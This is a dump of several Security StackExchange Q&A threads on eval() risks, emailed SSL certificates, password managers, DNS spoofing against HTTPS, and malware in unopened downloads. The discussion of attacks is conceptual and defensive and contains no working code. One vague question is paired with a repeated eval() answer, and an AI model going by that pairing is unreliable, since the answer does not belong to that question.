piece of code works properly on correct data, but not that it never works improperly on incorrect data. Similarly, using eval() securely is possible, but it is so hard in practice that it is discouraged. All of this is said in all generality. In your specific context, eval() might be safe. However, it takes some effort to have a context safe for use of eval() , that actually needs eval() .
{ "source": [ "https://security.stackexchange.com/questions/94017", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78741/" ] }
94,043
I'm just wondering I'm not a criminal but a friend is also wondering and Idk.
eval() executes a string of characters as code. You use eval() precisely because the string contents are not known in advance, or even generated server-side; basically, you need eval() because the JavaScript itself will generate the string from data which is available only dynamically, in the client. Thus, eval() makes sense in situations where the JavaScript code will generate code. This is not intrinsically evil , but it is hard to do securely. Programming languages are designed to allow a human being to write instructions that a computer understands; to that effect, any language is full of small quirks and special behaviours that are supposed to help the human programmer (e.g. the automatic adding of ';' at the end of some statements in JavaScript). This is all nice and dandy for "normal" programming; but when you generate code from another program, based on data which may be potentially hostile (e.g. string excerpt from other site users), then you have to, as the developer for the code generator, know about all these quirks, and prevent hostile data to exploit them in damaging ways. In that sense, code generators (and thus eval() ) incur the same conceptual issues as raw SQL and its consequence, SQL injection attacks . Assembling at runtime an SQL request from externally provided parameters can be done securely, but this requires minding an awful lot of details, so the usual advice is not to do that. This relates to the usual conundrum of security, i.e. that it is not testable: you can test whether some piece of code works properly on correct data, but not that it never works improperly on incorrect data. Similarly, using eval() securely is possible, but it is so hard in practice that it is discouraged. All of this is said in all generality. In your specific context, eval() might be safe. However, it takes some effort to have a context safe for use of eval() , that actually needs eval() .
{ "source": [ "https://security.stackexchange.com/questions/94043", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81096/" ] }
94,095
I just ordered a cheap Comodo PositiveSSL Certificate via a UK reseller, and I was rather surprised to find that the following files were emailed to me automatically, in a zip file: Root CA Certificate - AddTrustExternalCARoot.crt Intermediate CA Certificate - COMODORSAAddTrustCA.crt Intermediate CA Certificate - COMODORSADomainValidationSecureServerCA.crt Your PositiveSSL Certificate - domain_name.crt Additionally the cert itself (the last file) is added in text form at the end of the email. It's for a site that does not need a lot of security - it does not handle credit cards or other highly confidential information. I set up a strong passphrase on the associated private key. Am I right in assuming this cert is useless without the private key and passphrase? Or, given that email can be considered compromised, would an attacker wishing to decrypt my site traffic be at an advantage if they have these files? I am minded to re-generate the certificate immediately, but I worry that Comodo will just "helpfully" send me a new zip file. I would much rather download all these files from the reseller's SSL website.
You are right assuming the certificate is useless without the private key, so sending it in the mail is no big security risk and is common practice actually. The certificate is supposed to be public, connecting to your website would also provide me with your certificate, so no need to hack your email there. edit When starting the connection the server sends the certificate which incorporates the public key. The client will generate a (symmetric) session key used for encrypting the rest of the communication and encrypt this with the public key. Now only the server with the corresponding private key can decrypt this session key and use it to decrypt and encrypt the following data. This way it doesn't matter if someone else has your certificate, as long as they don't have the private key belonging to it, they won't be able to decrypt the session key and won't be able to impersonate your server.
{ "source": [ "https://security.stackexchange.com/questions/94095", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81142/" ] }
94,102
I have heard from different people and in different places that if I send an encrypted file to someone else, I should send them the password in a separate email; but why? If someone is sniffing, they will capture both and if the inbox is compromised, they will capture both. But apparently, it's "best practice" to send it separately. Now personally, I would send a password via other means, such as a phone call. What would you guys recommend?
There is added noise to the channel if you send them separately, assuming there is a delay in sending the second email the attacker would have to listen for a longer period of time and filter more content. It is simply a little bit safer than sending everything in the same package, think of ordering a safe box and shipping the keys along with it, its basically the same idea. You are right in thinking that sending the password via a different channel (sms, phone, etc) is more secure, however it also requires more management and collection of more information, the logistics of doing it come with an added cost.
{ "source": [ "https://security.stackexchange.com/questions/94102", "https://security.stackexchange.com", "https://security.stackexchange.com/users/49043/" ] }
94,106
I've been thinking of a problem with usual password managers: although they do provide better security than manually using passwords, there's a central database that can get lost, get compromised, etc. For example, malware could use a keylogger to get your master password and then compromise all the passwords in the password file. Cloud-based solutions also raise the privacy issue of the cloud service knowing when exactly you access your passwords. And there's always the possibility that the cloud service keeps around an unencrypted copy of all your information. Or somebody bribes LastPass's developers with a million dollars to have LastPass send everything to the attacker, or something. More realistically, password managers seem to decrease security in the event of a targeted attack. I've had a random idea to have a stateless password manager that would basically operate by hashing together a username, the website domain (or some user-chosen site identifier), and the master password to generate the password for each account the user has. In this way, there's no database to be kept around, and it's possible for users to use their passwords on, e.g. public computers by, say, manually computing the hash using some online JavaScript hashing tool. This sounds pretty secure, but it also sounds pretty obvious, and usually if an obvious idea isn't a thing it's because there's some pitfall. Is there? Why don't password managers do this instead of storing everything in a big file?
One problem with this kind of solution where a predictable algorithm is used to generate a secret from a master password/phrase, is that if your master password is compromised directly (e.g. keylogger) or indirectly (e.g. an attacker with a password of yours generated through this system who can carry out a brute-force attack on it), the attacker has effectively compromised the security of all of your accounts, as they would be able to easily generate the passwords you use for all sites.
{ "source": [ "https://security.stackexchange.com/questions/94106", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20703/" ] }
94,221
I am soon to start my compulsory military service. I applied to the Cyber Warfare Unit of Finnish army. There was a test for applicants. Since the test is done the questions have now been published here: http://erityistehtavat.puolustusvoimat.fi/cyberchallenge.html Here is question 4: Two completely isolated programs get one random bit each from different hardware random number generators. After getting the bit each program guesses what the other program's random bit was. Programs can be different and use different strategies for guessing. After running them once, if at least one program guessed correctly, the author of the programs receives a prize. Is it possible to devise a strategy that provides a 100% chance of winning the prize? If yes, explain the strategy. I answered no because I couldn't figure out winning strategy. Was that the right answer or did I miss something?
There is actually a solution that will always succeed: Program A will guess the opposite of the value it receives, program B will guess the same value as the one it receives. You can also think of that as such: A guesses that they will receive different numbers; B guesses they receive the same. One of them is bound to be correct. If you look at the following table (r for receive, g for guess), you will see that either A or B is always right (* denotes correct response): rA | rB | gA | gB 0 0 1 0* 0 1 1* 1 1 0 0* 0 1 1 0 1*
{ "source": [ "https://security.stackexchange.com/questions/94221", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81234/" ] }
94,331
How does using SSL protect aginst dns spoof? since DNS is at a lower level and it is always work the same whether the user is visiting an HTTP or HTTPS site.
Assume you managed to poison the DNS cache for securesite.com with an IP that you control. Now, when the client visits https://securesite.com , it will resolve to your IP address. As part of the SSL handshake process, your server will need to send a valid certificate for securesite.com which contains the public key. At this point, you have 2 options. 1) Send the legitimate certificate. This will check out since the certificate is signed by a trusted CA. The client will then encrypt the master secret using the public key. It breaks down at this point, because without the private key, you cannot decrypt the master secret and thus you can't finish the connection setup. 2) Send a self signed certificate. However, since it is not signed by a trusted CA, a warning will show on the client's browser. If the client choose to proceed anyway, then you have successfully carried out the attack. DNS spoofing will generally not work on HTTPS websites unless the client chooses to ignore the warning signs or if you manage to obtain the private key for the site.
{ "source": [ "https://security.stackexchange.com/questions/94331", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81301/" ] }
94,356
If a file is downloaded from the Internet, and saved on disk, but is not opened by a user (if we keep autorun off), are there any chances that malicious code (e.g. a virus) in the file could trigger? I'm not asking about attacks that could be made while downloading, or on browsing to a site - imagine the file has somehow been stored onto the disk with no attack taking place. What risk do I then face from malware?
There are a few cases where simply downloading a file without opening it could lead to execution of attacker controlled code from within the file. It usually involves exploiting a known vulnerability within a program which will handle the file in some way. Here are some examples, but other cases are sure to exist: The file targets a vulnerability in your antivirus which triggers when the file is scanned The file targets a vulnerability in your file system such as NTFS where the filename or another property could trigger the bug The file targets a bug which can be triggered when generating a file preview such as PDF or image thumbnail A library file (ex. dll) could get executed when saved to the same directory where an application vulnerable to binary planting is executed from The file is a special file that can change the configuration of a program such as downloading a .wgetrc file with wget on Linux …and more
{ "source": [ "https://security.stackexchange.com/questions/94356", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81330/" ] }